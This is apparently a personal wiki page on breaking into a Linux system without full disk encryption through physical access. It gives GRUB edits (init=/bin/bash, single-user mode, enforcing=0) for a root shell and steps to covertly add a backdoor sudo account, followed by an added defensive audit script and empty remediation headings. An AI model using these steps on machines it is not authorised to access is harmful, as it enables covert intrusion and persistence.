

Breaking into Linux systems:

Objectives

To explore the various methods of breaking into a Linux system that does not use FDE (Full Disk Encryption) when an attacker has physical access to it, and to examine the procedure for setting up FDE and other remediations that prevent this.

Prerequisites

  • Physical access to the target machine
  • ~60 seconds

Procedure

Method 1:

  1. Power on/reboot the target machine
    1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
    3. If all else fails, press the Reset button or power cycle the target machine.
  2. Press/hold the <Escape> key as soon as you see the GRUB splash screen.
  3. At the grub prompt, press 'e' to edit the boot entry.
  4. While still inside grub, add “init=/bin/bash” to the end of the “kernel” line:
    kernel=/vmlinuz-<version> [...parameters...] init=/bin/bash
  5. Continue booting.

DONE! THAT'S ALL FOLKS! After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script '/etc/rc.d/rc.sysinit' was bypassed and NOT executed, we need to remount the root file system and make some changes to make the system more usable:

  1. Mount the /proc file system:
    # mount /proc

    You will see an error message complaining that it was already mounted. Ignore it.

  2. Remount the root file system in read-write mode:
    # mount -o remount,rw /
  3. Depending on how the target's file system is laid out, you may need to mount some other file systems. Let's view the file system table:
    # cat /etc/fstab

    Mount any other needed file systems (like '/home', '/usr', etc.).

  4. Do whatever nefarious things you want:
    1. Change the root account password:
      passwd root
    2. PROTIP: I don't recommend doing this, because the next time the real user logs into the system they will notice that their root password has been changed. We need to be super sneaky, secretive, and surreptitious, so here's something a little less noticeable:
      1. Simply add another user without modifying the original root password:
        adduser -D -u 1000 bad-user
        passwd bad-user
      2. Also add the newly created user to the sudoers file. This is also not as noticeable as changing the actual root password:
        visudo
        bad-user ALL=(ALL) ALL
  5. Reboot the target machine to make the changes persistent. First run 'sync' a few times to tell the kernel to flush any pending disk I/O out to the hardware, then 'umount' the mounted file systems in reverse order.
  6. Once the file systems are all unmounted, you can reboot with either <Ctrl><Alt><Del> or the power switch.

Method 2: boot to single-user mode

  1. Power on/reboot the target machine
    1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
    3. If all else fails, press the Reset button or power cycle the target machine.
  2. Press/hold the <Escape> key as soon as you see the GRUB splash screen.
  3. At the grub prompt, press 'a' to modify the kernel parameters.
  4. Add a space and the letter 'S' (lower or upper case) to the end of the kernel parameters line:
    kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S
    1. Sometimes there are still mysterious failures in single-user mode because of Security-Enhanced Linux (SELinux) policy enforcement. In that case, add another boot parameter before the 'S':
      enforcing=0
  5. Now press <Enter> to boot with the newly added parameter.
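A defender's audit script, added here as an example and not part of the original page: it checks for the traces that Method 1 and Method 2 leave behind (a second account sharing UID 1000, an extra per-user sudoers grant, and an init=/bin/bash, S or enforcing=0 parameter on the kernel command line). The file names and sample contents are constructed for the example; on a real host you would point audit_all at copies of /etc/passwd, /etc/sudoers and /proc/cmdline.

```sh
#!/bin/sh
# Added audit helper (not from the original page): report the traces the two
# methods above leave behind. Sample files are constructed here; on a real
# host point audit_all at copies of /etc/passwd, /etc/sudoers and /proc/cmdline.
tmp=$(mktemp -d)
cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bad-user:x:1000:1000:Linux User,,,:/home/bad-user:/bin/sh
EOF
cat > "$tmp/sudoers" <<'EOF'
root ALL=(ALL) ALL
%wheel ALL=(ALL) ALL
bad-user ALL=(ALL) ALL
EOF
printf '%s\n' 'BOOT_IMAGE=/vmlinuz-4.18 root=LABEL=/ ro init=/bin/bash' > "$tmp/cmdline"

# audit_passwd FILE: list UIDs shared by more than one account (adduser -u 1000
# on a box that already has a UID-1000 user produces exactly this).
audit_passwd() {
    awk -F: '{ n[$3]++; who[$3] = who[$3] " " $1 }
        END { for (u in n) if (n[u] > 1) print "duplicate uid " u ":" who[u] }' "$1"
}

# audit_sudoers FILE: list per-user grants other than root's own
# (group, alias and comment lines starting with %, @ or # are skipped).
audit_sudoers() {
    grep -E '^[^#%@[:space:]]+[[:space:]]+ALL=' "$1" |
        awk '$1 != "root" { print "sudo grant for " $1 }'
}

# audit_cmdline FILE: flag init= overrides and the single-user / enforcing=0
# parameters; only meaningful for the current boot, since a reboot clears them.
audit_cmdline() {
    tr ' ' '\n' < "$1" |
        grep -E '^(init=|enforcing=0$|[sS]$|single$)' |
        sed 's/^/suspicious boot parameter: /'
}

# audit_all DIR: run all three checks on the files in DIR.
audit_all() {
    audit_passwd "$1/passwd"
    audit_sudoers "$1/sudoers"
    audit_cmdline "$1/cmdline"
}

audit_all "$tmp"
```

The boot-parameter check only catches the current boot; the passwd and sudoers traces are what survive the reboot in step 5 of Method 1.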

Remediation Methods

Method 1:

Method 2:

General Remediation Methods

Setting up Full Disk Encryption:

Other Remediations:



user/nbrimme1/portfolio/break-into-linux.1538175073.txt.gz · Last modified: 2018/09/28 22:51 by nbrimme1